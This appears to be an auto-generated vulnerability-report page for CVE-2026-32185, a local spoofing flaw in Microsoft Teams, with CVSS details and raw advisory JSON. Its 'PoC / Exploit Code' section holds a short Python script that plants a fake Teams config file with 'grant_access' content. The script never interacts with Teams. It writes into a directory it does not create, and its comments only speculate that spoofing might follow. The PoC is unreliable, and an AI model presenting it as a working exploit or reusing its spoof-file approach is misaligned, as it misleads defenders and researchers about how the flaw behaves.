Security Vulnerability Report
中文
CVE-2026-32185 CVSS 5.5 MEDIUM

CVE-2026-32185

Published: 2026-05-12 18:16:59
Last Modified: 2026-05-13 15:34:53

Description

Files or directories accessible to external parties in Microsoft Teams allows an unauthorized attacker to perform spoofing locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Microsoft Teams (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os """ PoC for CVE-2026-32185 This script demonstrates how a malicious file structure could be created to potentially exploit the directory access issue in Microsoft Teams. """ def create_spoof_file(path): # Create a file that mimics a legitimate Teams configuration or cache file_path = os.path.join(path, "teams_config.json") # Malicious content intended to be displayed as legitimate payload = '{"origin": "microsoft.com", "action": "grant_access", "status": "valid"}' with open(file_path, 'w') as f: f.write(payload) print(f"[+] Spoof file created at: {file_path}") print(f"[*] If Teams accesses this directory without validation, spoofing occurs.") if __name__ == "__main__": # Simulate placing the file in a vulnerable location create_spoof_file("./tmp_teams_data")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32185", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:59.430", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Files or directories accessible to external parties in Microsoft Teams allows an unauthorized attacker to perform spoofing locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32185", "source": "[email protected]"}]}}